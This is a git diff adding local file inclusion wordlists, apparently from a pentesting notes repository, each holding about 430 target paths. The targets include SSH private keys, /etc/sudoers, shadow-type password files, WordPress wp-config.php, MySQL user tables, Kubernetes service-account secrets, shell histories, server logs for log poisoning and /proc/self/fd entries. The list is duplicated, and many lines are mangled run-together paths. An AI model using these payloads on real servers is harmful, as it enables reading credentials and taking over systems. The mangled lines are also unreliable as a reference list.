+/usr/local/etc/apache/vhosts.confetc/php.ini
+/usr/local/etc/php.ini
+/usr/local/etc/pure-ftpd.conf
+/usr/local/etc/pureftpd.pdb
+/usr/local/httpd/conf/httpd.conf
+/usr/local/lib/php.iniusr/local/php/lib/php.ini
+/usr/local/php4/httpd.conf
+/usr/local/php4/httpd.conf.php
+/usr/local/php4/lib/php.ini
+/usr/local/php5/httpd.conf
+/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
+/usr/local/php5/lib/php.ini
+/usr/local/php/httpd.conf.php
+/usr/local/pureftpd/etc/pure-ftpd.conf
+/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
+/usr/local/Zend/etc/php.ini
+/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
+/usr/ports/ftp/pure-ftpd/
+/usr/ports/net/pure-ftpd/
+/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
+/var/adm/log/xferlog
+/var/cpanel/cpanel.config
+/var/lib/mysql/my.cnf
+/var/local/www/conf/php.inietc/php/cgi/php.ini
+/var/log/access.log
+/var/log/apache2/access.log
+/var/log/apache2/access_logvar/log/httpd/error_log
+/var/log/apache/error.log
+/var/log/cron.logvar/log/couchdb/couch.log
+/var/log/dmessage
+/var/log/error_log
+/var/log/error.logvar/log/apache/access_log
+/var/log/exim4/mainlog
+/var/log/exim4_mainlog
+/var/log/exim4/paniclog
+/var/log/exim_mainlog
+/var/log/exim/mainlogvar/log/maillog
+/var/log/exim/paniclog
+/var/log/exim_paniclog
+/var/log/exim/rejectlog
+/var/log/exim_rejectlog
+/var/log/ftplog
+/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
+/var/log/httpd/access.log
+/var/log/httpd/access_log
+/var/log/httpd/error.log
+/var/log/mail
+/var/log/mail.log
+/var/log/messages
+/var/log/mysqlderror.logvar/log/mysql/mysql.log
+/var/log/mysql.log
+/var/log/mysql/mysql-bin.log
+/var/log/mysql/mysql-slow.log
+/var/log/news
+/var/log/nginx/access.logproc/self/cmdline
+/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
+var/log/postgresql/postgresql-9.6-mail.log
+/var/log/proftpd
+/var/log/pureftpd.log
+/var/log/pure-ftpd/pure-ftpd.log
+/var/log/qmail
+/var/log/redis/redis-server.log
+/var/log/samba/log.smbd
+/var/log/smtpd
+/var/log/spooler
+/var/log/syslog
+/var/log/telnetd
+/var/mail/root
+/var/mysql.log
+/var/spool/cron/crontabs/root
+/var/www/conf/httpd.conf
+/var/www/logs/access_logvar/www/logs/access.log
+/var/www/logs/error.log
+/var/www/logs/error_log
+/var/www/mgr/logs/access.log
+/var/www/mgr/logs/error_log
+/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
+/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
+/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
+/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
+/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
+/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
+/Volumes/webBackup/private/etc/httpd/httpd.conf
+/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
+/web/conf/php.ini
+/WINDOWSphp.iniWINNTphp.ini
+/xamppapachebinphp.ini
diff --git a/.gitbook/assets/lfi (2).txt b/.gitbook/assets/lfi (2).txt
new file mode 100644
index 00000000..57214136
--- /dev/null
+++ b/.gitbook/assets/lfi (2).txt	
@@ -0,0 +1 @@
+423
diff --git a/.gitbook/assets/lfi (3).txt b/.gitbook/assets/lfi (3).txt
new file mode 100644
index 00000000..dd887237
--- /dev/null
+++ b/.gitbook/assets/lfi (3).txt	
@@ -0,0 +1,430 @@
+/apache/logs/access.log
+/apache/logs/access_log
+/apache/logs/error.log
+/apache/logs/error_log
+~/.atfp_history
+~/.bash_history
+~/.bash_logout
+~/.bash_profile
+~/.bashrc
+/bin/php.ini
+/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
+/etc/anaconda-ks.cfg
+/etc/anacrontab
+/etc/apache2/apache2.conf
+/etc/apache2/conf/httpd.conf
+/etc/apache/conf/httpd.conf
+/etc/at.allow
+/etc/at.deny
+/etc/bashrc
+/etc/bootptab
+/etc/centos-release
+/etc/cesi.conf
+/etc/chrootUsers
+/etc/chrootUsersvar/log/xferlog
+/etc/chttp.conf
+/etc/cron.allow
+/etc/cron.deny
+/etc/crontab
+/etc/cups/cupsd.conf
+/etc/debconf.conf
+/etc/debian_version
+/etc/dovecot/dovecot.passwd
+/etc/environment
+/etc/fstab
+/etc/ftpaccess
+/etc/groups
+/etc/grub.conf
+/etc/gshadow
+/etc/hostapd.conf
+/etc/hostname
+/etc/hosts.allow
+/etc/hosts.deny
+/etc/http/conf/httpd.conf
+/etc/httpd/access.conf
+/etc/httpd.conf
+/etc/httpd/srm.conf
+/etc/http/httpd.conf
+/etc/inetd.conf
+/etc/inittab
+/etc/lighttpd.conf
+/etc/lilo.conf
+/etc/logrotate.d/proftpd
+/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
+/etc/lsb-release
+/etc/master.passwd
+/etc/modules.conf
+/etc/motdetc/passwd
+/etc/mtab
+/etc/my.conf
+/etc/mysql/user.MYD
+/etc/netconfig
+/etc/network/interfaces
+/etc/networks
+/etc/npasswd
+/etc/ntp.conf
+/etc/os-release
+/etc/php4.4/fcgi/php.ini
+/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
+/etc/php4/apache/php.ini
+/etc/php5/cgi/php.ini
+/etc/php/apache/php.ini
+/etc/php/cgi/php.ini
+/etc/php.ini
+/etc/php/php4/php.ini
+/etc/php/php4/php.inietc/php/apache/php.ini
+/etc/polkit-1/localauthority.conf.d/50-localauthority.conf
+/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf
+/etc/printcap
+/etc/proftpd/modules.confvar/log/vsftpd.log
+/etc/proftpd/proftpd.conf
+/etc/protocols
+/etc/protpd/proftpd.conf
+/etc/pureftpd.passwd
+/etc/pureftpd.pdb
+/etc/pureftpd.pdbetc/pureftpd.passwd
+/etc/pure-ftpd/pureftpd.pdb
+/etc/pure-ftpd/putreftpd.pdb
+/etc/rsyncd.conf
+/etc/rsyslog.conf
+/etc/redhat-release
+/etc/samba/smb.conf
+/etc/security/environetc/security/limits
+/etc/security/group
+/etc/security/passwd
+/etc/security/user
+/etc/services
+/etc/shells
+/etc/snmpd.conf
+/etc/ssh/ssh_host_ecdsa_key
+/etc/ssh/ssh_host_ecdsa_key.pub
+/etc/ssh/ssh_host_key
+/etc/ssh/ssh_host_key.pub
+/etc/ssh/ssh_host_rsa_key
+/etc/ssh/ssh_host_rsa_key.pub
+/etc/sudoers
+/etc/supervisord.conf
+/etc/sysconfig/network
+/etc/sysctl.conf
+/etc/syslog.conf
+/etc/system-release
+/etc/termcap
+/etc/timezone
+/etc/tomcat/tomcat-users.xml
+/etc/updatedb.conf
+~/.gtkrc
+/local/apache2/conf/httpd.conf
+/log/apache2/error_log
+~/.login
+~/.logout
+/logs/access.log
+/logs/access_log
+/logs/error.log
+/logs/error_log
+/logs/security_debug_log
+/logs/security_log
+~/.mysql_history
+~/.nano_history
+/opt/apache2/conf/httpd.conf
+/opt/apache/conf/httpd.conf
+/opt/lampp/etc/httpd.conf
+/opt/lampp/logs/access.log
+/opt/lampp/logs/access_log
+/opt/lampp/logs/error_log
+/opt/lampp/logs/error.logopt
+/opt/xampp/logs/access.log
+/opt/xampp/logs/error.log
+/opt/xampp/logs/error_log
+/php4php.ini
+/php5php.ini
+~/.php_history
+/phpphp.ini
+/PHPphp.ini
+/private/etc/httpd/httpd.conf
+/private/etc/httpd/httpd.conf.
+/proc/cpuinfo
+/proc/filesystems
+/proc/interrupts
+/proc/ioports
+/proc/meminfo
+/proc/modules
+/proc/self/cmdline
+/proc/self/cwd/index.php
+/proc/self/fd/0
+/proc/self/fd/1
+/proc/self/fd/10
+/proc/self/fd/100
+/proc/self/fd/11
+/proc/self/fd/12
+/proc/self/fd/13
+/proc/self/fd/14
+/proc/self/fd/15
+/proc/self/fd/16
+/proc/self/fd/17
+/proc/self/fd/18
+/proc/self/fd/19
+/proc/self/fd/2
+/proc/self/fd/20
+/proc/self/fd/21
+/proc/self/fd/22
+/proc/self/fd/23
+/proc/self/fd/24
+/proc/self/fd/25
+/proc/self/fd/26
+/proc/self/fd/27
+/proc/self/fd/28
+/proc/self/fd/29
+/proc/self/fd/3
+/proc/self/fd/30
+/proc/self/fd/31
+/proc/self/fd/32
+/proc/self/fd/33
+/proc/self/fd/34
+/proc/self/fd/35
+/proc/self/fd/36
+/proc/self/fd/37
+/proc/self/fd/38
+/proc/self/fd/39
+/proc/self/fd/4
+/proc/self/fd/41
+/proc/self/fd/42
+/proc/self/fd/43
+/proc/self/fd/44
+/proc/self/fd/45
+/proc/self/fd/46
+/proc/self/fd/47
+/proc/self/fd/48
+/proc/self/fd/49
+/proc/self/fd/5
+/proc/self/fd/51
+/proc/self/fd/52
+/proc/self/fd/53
+/proc/self/fd/54
+/proc/self/fd/55
+/proc/self/fd/56
+/proc/self/fd/57
+/proc/self/fd/58
+/proc/self/fd/59
+/proc/self/fd/6
+/proc/self/fd/61
+/proc/self/fd/62
+/proc/self/fd/63
+/proc/self/fd/64
+/proc/self/fd/65
+/proc/self/fd/66
+/proc/self/fd/67
+/proc/self/fd/68
+/proc/self/fd/69
+/proc/self/fd/7
+/proc/self/fd/71
+/proc/self/fd/72
+/proc/self/fd/73
+/proc/self/fd/74
+/proc/self/fd/75
+/proc/self/fd/76
+/proc/self/fd/77
+/proc/self/fd/78
+/proc/self/fd/79
+/proc/self/fd/8
+/proc/self/fd/81
+/proc/self/fd/82
+/proc/self/fd/83
+/proc/self/fd/84
+/proc/self/fd/85
+/proc/self/fd/86
+/proc/self/fd/87
+/proc/self/fd/88
+/proc/self/fd/89
+/proc/self/fd/9
+/proc/self/fd/91
+/proc/self/fd/92
+/proc/self/fd/93
+/proc/self/fd/94
+/proc/self/fd/95
+/proc/self/fd/96
+/proc/self/fd/97
+/proc/self/fd/98
+/proc/self/fd/99
+/proc/self/net/arp
+/proc/self/stat
+/proc/self/status
+/proc/self/statvar
+/proc/stat
+/proc/swaps
+~/.profile
+/root/anaconda-ks.cfg
+/root/.bash_history
+/root/.ssh/authorized_hosts
+/root/.ssh/authorized_keys
+/root/.ssh/id_dsa
+/root/.ssh/id_rsa
+/root/.ssh/known_hosts
+~/.ssh/authorized_keys
+~/.ssh/id_dsa
+~/.ssh/id_dsa.pub
+~/.ssh/identity
+~/.ssh/identity.pub
+~/.ssh/id_rsa
+~/.ssh/id_rsa.pub
+/usr/apache2/conf/httpd.conf
+/usr/apache/conf/httpd.conf
+/usr/etc/pure-ftpd.conf
+/usr/lib/security/mkuser.default
+/usr/local/apache2/conf/httpd.conf
+/usr/local/apache2/log/error_log
+/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
+/usr/local/apache2/logs/error_log
+/usr/local/apache2/logs/error.logvar/log/access_log
+/usr/local/apache/audit_log
+/usr/local/apache/conf/modsec.conf
+/usr/local/apache/error.log
+/usr/local/apache/error_log
+/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
+/usr/local/apache/log
+/usr/local/apache/log/error_log
+/usr/local/apache/logs
+/usr/local/apache/logs/access.log
+/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
+/usr/local/apache/logs/error.log
+/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
+/usr/local/cpanel/logs/access_log
+/usr/local/cpanel/logs/login_log
+/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
+/usr/local/cpanel/logs/stats_log
+/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
+/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
+/usr/local/etc/apache/conf/httpd.conf
+/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
+/usr/local/etc/apache/vhosts.confetc/php.ini
+/usr/local/etc/httpd/logs/access_log
+/usr/local/etc/httpd/logs/error_log
+/usr/local/httpd/conf/httpd.conf
+/usr/local/lib/php.ini
+/usr/local/lib/php.iniusr/local/php/lib/php.ini
+/usr/local/php5/httpd.conf.php
+/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
+/usr/local/php/httpd.conf
+/usr/local/php/httpd.conf.ini
+/usr/local/php/httpd.conf.php
+/usr/local/php/lib/php.ini
+/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
+/usr/local/pureftpd/etc/pureftpd.pdn
+/usr/local/pureftpd/sbin/pure-config.pl
+/usr/local/www/logs/httpd_log
+/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
+/usr/ports/ftp/pure-ftpd/
+/usr/ports/net/pure-ftpd/
+/usr/sbin/pure-config.pl
+/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
+/usr/var/lib/mysql/debian.cnf
+/usr/var/lib/mysql/my.cnf
+/usr/var/lib/mysql/user.MYD
+/var/apache2/config.inc
+/var/apache/logs/access_log
+/var/apache/logs/error_log
+/var/htmp
+/var/lib/mysql/debian.cnf
+/var/lib/mysql/mysql/user.MYD
+/var/lib/mysql/user.MYD
+/var/local/www/conf/php.ini
+/var/local/www/conf/php.inietc/php/cgi/php.ini
+/var/log/access.log
+/var/log/apache2/access_log
+/var/log/apache2/access_logvar/log/httpd/error_log
+/var/log/apache2/error.log
+/var/log/apache2/error_log
+/var/log/apache/access_log
+/var/log/apache/error_log
+/var/log/apache-ssl/access.log
+/var/log/apache-ssl/error.log
+/var/log/auth.log
+/var/log/boot
+/var/log/chttp.log
+/var/log/cron.logvar/log/couchdb/couch.log
+/var/log/cups/error.log
+/var/log/daemon.log
+/var/log/debug
+/var/log/dmesg
+/var/log/dmessage
+/var/log/dpkg.log
+/var/log/error_log
+/var/log/error.logvar/log/apache/access_log
+/var/log/exim4/mainlog
+/var/log/exim4_mainlog
+/var/log/exim4/paniclog
+/var/log/exim/mainlog
+/var/log/exim/mainlogvar/log/maillog
+/var/log/exim.paniclog
+/var/log/exim/paniclog
+/var/log/faillog
+/var/log/ftp-proxy
+/var/log/ftp-proxy/ftp-proxy.log
+/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
+/var/log/httpsd/ssl.access_log
+/var/log/httpsd/ssl_log
+/var/log/kern.log
+/var/log/lastlog
+/var/log/lighttpd/access.log
+/var/log/lighttpd/error.log
+/var/log/lighttpd/lighttpd.access.log
+/var/log/lighttpd/lighttpd.error.log
+/var/log/mail.info
+/var/log/maillog
+/var/log/mail.warn
+/var/log/message
+/var/log/mysqlderror.log
+/var/log/mysqlderror.logvar/log/mysql/mysql.log
+/var/log/mysql/mysql.log
+/var/log/news
+/var/log/nginx/access.log
+/var/log/nginx/access.logproc/self/cmdline
+/var/log/nginx/error.log
+/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
+/var/log/postgresql/postgresql-9.6-mail.log
+/var/log/qmail
+/var/log/redis/redis-server.log
+/var/log/samba/log.smbd
+/var/log/secure
+/var/log/smtpd
+/var/log/spooler
+/var/log/sshd.log
+/var/log/syslog
+/var/log/telnetd
+/var/log/wtmp
+/var/log/xferlog
+/var/log/yum.log
+/var/mail/root
+/var/run/secrets/kubernetes.io/serviceaccount
+/var/run/utmp
+/var/webmin/miniserv.log
+/var/www/conf/httpd.conf
+/var/www/html/wordpress/wp-config.php
+/var/www/html/wp/wp-config.php
+/var/www/log/access_log
+/var/www/log/error_log
+/var/www/logs/access.log
+/var/www/logs/access_log
+/var/www/logs/access_logvar/www/logs/access.log
+/var/www/mgr/logs/access.log
+/var/www/mgr/logs/error_log
+/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
+/var/www/wordpress/wp-config.php
+/var/www/wp/wp-config.php
+~/.viminfo
+/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
+/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.confVolumes/Macintosh_HD1/opt/apache/conf/httpd.conf
+/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
+/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.phpVolumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
+/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
+/Volumes/webBackup/private/etc/httpd/httpd.conf
+/Volumes/webBackup/private/etc/httpd/httpd.conf.defaultProgramFilesApacheGroupApacheconfhttpd.conf
+/web/conf/php.ini
+/WINDOWSphp.ini
+/WINNTphp.ini
+~/.wm_style
+/xamppapachebinphp.ini
+/xampp/logs/access_log
+~/.Xdefaults
+~/.xinitrc
+~/.Xresources
+~/.xsession
\ No newline at end of file
diff --git a/.gitbook/assets/lfi-with-phpinfo-assistance.pdf b/.gitbook/assets/lfi-with-phpinfo-assistance.pdf
new file mode 100644
index 00000000..3525b48e
Binary files /dev/null and b/.gitbook/assets/lfi-with-phpinfo-assistance.pdf differ
diff --git a/.gitbook/assets/lfi.txt b/.gitbook/assets/lfi.txt
new file mode 100644
index 00000000..dd887237
--- /dev/null
+++ b/.gitbook/assets/lfi.txt
@@ -0,0 +1,430 @@
+/apache/logs/access.log
+/apache/logs/access_log
+/apache/logs/error.log
+/apache/logs/error_log
+~/.atfp_history
+~/.bash_history
+~/.bash_logout
+~/.bash_profile
+~/.bashrc
+/bin/php.ini
+/defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
+/etc/anaconda-ks.cfg
+/etc/anacrontab
+/etc/apache2/apache2.conf
+/etc/apache2/conf/httpd.conf
+/etc/apache/conf/httpd.conf
+/etc/at.allow
+/etc/at.deny
+/etc/bashrc
+/etc/bootptab
+/etc/centos-release
+/etc/cesi.conf
+/etc/chrootUsers
+/etc/chrootUsersvar/log/xferlog
+/etc/chttp.conf
+/etc/cron.allow
+/etc/cron.deny
+/etc/crontab
+/etc/cups/cupsd.conf
+/etc/debconf.conf
+/etc/debian_version
+/etc/dovecot/dovecot.passwd
+/etc/environment
+/etc/fstab
+/etc/ftpaccess
+/etc/groups
+/etc/grub.conf
+/etc/gshadow
+/etc/hostapd.conf
+/etc/hostname
+/etc/hosts.allow
+/etc/hosts.deny
+/etc/http/conf/httpd.conf
+/etc/httpd/access.conf
+/etc/httpd.conf
+/etc/httpd/srm.conf
+/etc/http/httpd.conf
+/etc/inetd.conf
+/etc/inittab
+/etc/lighttpd.conf
+/etc/lilo.conf
+/etc/logrotate.d/proftpd
+/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
+/etc/lsb-release
+/etc/master.passwd
+/etc/modules.conf
+/etc/motdetc/passwd
+/etc/mtab
+/etc/my.conf
+/etc/mysql/user.MYD
+/etc/netconfig
+/etc/network/interfaces
+/etc/networks
+/etc/npasswd
+/etc/ntp.conf
+/etc/os-release
+/etc/php4.4/fcgi/php.ini
+/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
+/etc/php4/apache/php.ini
+/etc/php5/cgi/php.ini
+/etc/php/apache/php.ini
+/etc/php/cgi/php.ini
+/etc/php.ini
+/etc/php/php4/php.ini
+/etc/php/php4/php.inietc/php/apache/php.ini
+/etc/polkit-1/localauthority.conf.d/50-localauthority.conf
+/etc/polkit-1/localauthority.conf.d/51-debian-sudo.conf
+/etc/printcap
+/etc/proftpd/modules.confvar/log/vsftpd.log
+/etc/proftpd/proftpd.conf
+/etc/protocols
+/etc/protpd/proftpd.conf
+/etc/pureftpd.passwd
+/etc/pureftpd.pdb
+/etc/pureftpd.pdbetc/pureftpd.passwd
+/etc/pure-ftpd/pureftpd.pdb
+/etc/pure-ftpd/putreftpd.pdb
+/etc/rsyncd.conf
+/etc/rsyslog.conf
+/etc/redhat-release
+/etc/samba/smb.conf
+/etc/security/environetc/security/limits
+/etc/security/group
+/etc/security/passwd
+/etc/security/user
+/etc/services
+/etc/shells
+/etc/snmpd.conf
+/etc/ssh/ssh_host_ecdsa_key
+/etc/ssh/ssh_host_ecdsa_key.pub
+/etc/ssh/ssh_host_key
+/etc/ssh/ssh_host_key.pub
+/etc/ssh/ssh_host_rsa_key
+/etc/ssh/ssh_host_rsa_key.pub
+/etc/sudoers
+/etc/supervisord.conf
+/etc/sysconfig/network
+/etc/sysctl.conf
+/etc/syslog.conf
+/etc/system-release
+/etc/termcap
+/etc/timezone
+/etc/tomcat/tomcat-users.xml
+/etc/updatedb.conf
+~/.gtkrc
+/local/apache2/conf/httpd.conf
+/log/apache2/error_log
+~/.login
+~/.logout
+/logs/access.log
+/logs/access_log
+/logs/error.log
+/logs/error_log
+/logs/security_debug_log
+/logs/security_log
+~/.mysql_history
+~/.nano_history
+/opt/apache2/conf/httpd.conf
+/opt/apache/conf/httpd.conf
+/opt/lampp/etc/httpd.conf
+/opt/lampp/logs/access.log
+/opt/lampp/logs/access_log
+/opt/lampp/logs/error_log
+/opt/lampp/logs/error.logopt
+/opt/xampp/logs/access.log
+/opt/xampp/logs/error.log
+/opt/xampp/logs/error_log
+/php4php.ini
+/php5php.ini
+~/.php_history
+/phpphp.ini
+/PHPphp.ini
+/private/etc/httpd/httpd.conf
+/private/etc/httpd/httpd.conf.
+/proc/cpuinfo
+/proc/filesystems
+/proc/interrupts
+/proc/ioports
+/proc/meminfo
+/proc/modules
+/proc/self/cmdline
+/proc/self/cwd/index.php
+/proc/self/fd/0
+/proc/self/fd/1
+/proc/self/fd/10
+/proc/self/fd/100
+/proc/self/fd/11
+/proc/self/fd/12
+/proc/self/fd/13
+/proc/self/fd/14
+/proc/self/fd/15
+/proc/self/fd/16
+/proc/self/fd/17
+/proc/self/fd/18
+/proc/self/fd/19
+/proc/self/fd/2
+/proc/self/fd/20
+/proc/self/fd/21
+/proc/self/fd/22
+/proc/self/fd/23
+/proc/self/fd/24
+/proc/self/fd/25
+/proc/self/fd/26
+/proc/self/fd/27
+/proc/self/fd/28
+/proc/self/fd/29
+/proc/self/fd/3
+/proc/self/fd/30
+/proc/self/fd/31
+/proc/self/fd/32
+/proc/self/fd/33
+/proc/self/fd/34
+/proc/self/fd/35
+/proc/self/fd/36
+/proc/self/fd/37
+/proc/self/fd/38
+/proc/self/fd/39
+/proc/self/fd/4
+/proc/self/fd/41
+/proc/self/fd/42
+/proc/self/fd/43
+/proc/self/fd/44
+/proc/self/fd/45
+/proc/self/fd/46
+/proc/self/fd/47
+/proc/self/fd/48
+/proc/self/fd/49
+/proc/self/fd/5
+/proc/self/fd/51
+/proc/self/fd/52
+/proc/self/fd/53
+/proc/self/fd/54
+/proc/self/fd/55
+/proc/self/fd/56
+/proc/self/fd/57
+/proc/self/fd/58
+/proc/self/fd/59
+/proc/self/fd/6
+/proc/self/fd/61
+/proc/self/fd/62
+/proc/self/fd/63
+/proc/self/fd/64
+/proc/self/fd/65
+/proc/self/fd/66
+/proc/self/fd/67
+/proc/self/fd/68
+/proc/self/fd/69
+/proc/self/fd/7
+/proc/self/fd/71
+/proc/self/fd/72
+/proc/self/fd/73
+/proc/self/fd/74
+/proc/self/fd/75
+/proc/self/fd/76
+/proc/self/fd/77
+/proc/self/fd/78
+/proc/self/fd/79
+/proc/self/fd/8
+/proc/self/fd/81
+/proc/self/fd/82
+/proc/self/fd/83
+/proc/self/fd/84
+/proc/self/fd/85
+/proc/self/fd/86
+/proc/self/fd/87
+/proc/self/fd/88
+/proc/self/fd/89
+/proc/self/fd/9
+/proc/self/fd/91
+/proc/self/fd/92
+/proc/self/fd/93
+/proc/self/fd/94
+/proc/self/fd/95
+/proc/self/fd/96
+/proc/self/fd/97
+/proc/self/fd/98
+/proc/self/fd/99
+/proc/self/net/arp
+/proc/self/stat
+/proc/self/status
+/proc/self/statvar
+/proc/stat
+/proc/swaps
+~/.profile
+/root/anaconda-ks.cfg
+/root/.bash_history
+/root/.ssh/authorized_hosts
+/root/.ssh/authorized_keys
+/root/.ssh/id_dsa
+/root/.ssh/id_rsa
+/root/.ssh/known_hosts
+~/.ssh/authorized_keys
+~/.ssh/id_dsa
+~/.ssh/id_dsa.pub
+~/.ssh/identity
+~/.ssh/identity.pub
+~/.ssh/id_rsa
+~/.ssh/id_rsa.pub
+/usr/apache2/conf/httpd.conf
+/usr/apache/conf/httpd.conf
+/usr/etc/pure-ftpd.conf
+/usr/lib/security/mkuser.default
+/usr/local/apache2/conf/httpd.conf
+/usr/local/apache2/log/error_log
+/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
+/usr/local/apache2/logs/error_log
+/usr/local/apache2/logs/error.logvar/log/access_log
+/usr/local/apache/audit_log
+/usr/local/apache/conf/modsec.conf
+/usr/local/apache/error.log
+/usr/local/apache/error_log
+/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
+/usr/local/apache/log
+/usr/local/apache/log/error_log
+/usr/local/apache/logs
+/usr/local/apache/logs/access.log
+/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
+/usr/local/apache/logs/error.log
+/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
+/usr/local/cpanel/logs/access_log
+/usr/local/cpanel/logs/login_log
+/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
+/usr/local/cpanel/logs/stats_log
+/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
+/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
+/usr/local/etc/apache/conf/httpd.conf
+/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
+/usr/local/etc/apache/vhosts.confetc/php.ini
+/usr/local/etc/httpd/logs/access_log
+/usr/local/etc/httpd/logs/error_log
+/usr/local/httpd/conf/httpd.conf
+/usr/local/lib/php.ini
+/usr/local/lib/php.iniusr/local/php/lib/php.ini
+/usr/local/php5/httpd.conf.php
+/usr/local/php5/httpd.conf.phpusr/local/php/httpd.conf
+/usr/local/php/httpd.conf
+/usr/local/php/httpd.conf.ini
+/usr/local/php/httpd.conf.php
+/usr/local/php/lib/php.ini
+/usr/local/pureftpd/etc/pureftpd.pdbusr/local/pureftpd/sbin/pure-config.pl
+/usr/local/pureftpd/etc/pureftpd.pdn
+/usr/local/pureftpd/sbin/pure-config.pl
+/usr/local/www/logs/httpd_log
+/usr/pkgsrc/net/pureftpd/usr/ports/contrib/pure-ftpd/
+/usr/ports/ftp/pure-ftpd/
+/usr/ports/net/pure-ftpd/
+/usr/sbin/pure-config.pl
+/usr/sbin/pure-config.plusr/etc/pure-ftpd.conf
+/usr/var/lib/mysql/debian.cnf
+/usr/var/lib/mysql/my.cnf
+/usr/var/lib/mysql/user.MYD
+/var/apache2/config.inc
+/var/apache/logs/access_log
+/var/apache/logs/error_log
+/var/htmp
+/var/lib/mysql/debian.cnf
+/var/lib/mysql/mysql/user.MYD
+/var/lib/mysql/user.MYD
+/var/local/www/conf/php.ini
+/var/local/www/conf/php.inietc/php/cgi/php.ini
+/var/log/access.log
+/var/log/apache2/access_log
+/var/log/apache2/access_logvar/log/httpd/error_log
+/var/log/apache2/error.log
+/var/log/apache2/error_log
+/var/log/apache/access_log
+/var/log/apache/error_log
+/var/log/apache-ssl/access.log
+/var/log/apache-ssl/error.log
+/var/log/auth.log
+/var/log/boot
+/var/log/chttp.log
+/var/log/cron.logvar/log/couchdb/couch.log
+/var/log/cups/error.log
+/var/log/daemon.log
+/var/log/debug
+/var/log/dmesg
+/var/log/dmessage
+/var/log/dpkg.log
+/var/log/error_log
+/var/log/error.logvar/log/apache/access_log
+/var/log/exim4/mainlog
+/var/log/exim4_mainlog
+/var/log/exim4/paniclog
+/var/log/exim/mainlog
+/var/log/exim/mainlogvar/log/maillog
+/var/log/exim.paniclog
+/var/log/exim/paniclog
+/var/log/faillog
+/var/log/ftp-proxy
+/var/log/ftp-proxy/ftp-proxy.log
+/var/log/ftp-proxy/ftp-proxy.logvar/log/ftp-proxy
+/var/log/httpsd/ssl.access_log
+/var/log/httpsd/ssl_log
+/var/log/kern.log
+/var/log/lastlog
+/var/log/lighttpd/access.log
+/var/log/lighttpd/error.log
+/var/log/lighttpd/lighttpd.access.log
+/var/log/lighttpd/lighttpd.error.log
+/var/log/mail.info
+/var/log/maillog
+/var/log/mail.warn
+/var/log/message
+/var/log/mysqlderror.log
+/var/log/mysqlderror.logvar/log/mysql/mysql.log
+/var/log/mysql/mysql.log
+/var/log/news
+/var/log/nginx/access.log
+/var/log/nginx/access.logproc/self/cmdline
+/var/log/nginx/error.log
+/var/log/postgresql/postgresql-10-main.logvar/log/apache2/error.log
+/var/log/postgresql/postgresql-9.6-mail.log
+/var/log/qmail
+/var/log/redis/redis-server.log
+/var/log/samba/log.smbd
+/var/log/secure
+/var/log/smtpd
+/var/log/spooler
+/var/log/sshd.log
+/var/log/syslog
+/var/log/telnetd
+/var/log/wtmp
+/var/log/xferlog
+/var/log/yum.log
+/var/mail/root
+/var/run/secrets/kubernetes.io/serviceaccount
+/var/run/utmp
+/var/webmin/miniserv.log
+/var/www/conf/httpd.conf
+/var/www/html/wordpress/wp-config.php
+/var/www/html/wp/wp-config.php
+/var/www/log/access_log
+/var/www/log/error_log
+/var/www/logs/access.log
+/var/www/logs/access_log
+/var/www/logs/access_logvar/www/logs/access.log
+/var/www/mgr/logs/access.log
+/var/www/mgr/logs/error_log
+/var/www/mgr/logs/error.logvar/www/mgr/logs/access_log
+/var/www/wordpress/wp-config.php
+/var/www/wp/wp-config.php
+~/.viminfo
+/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
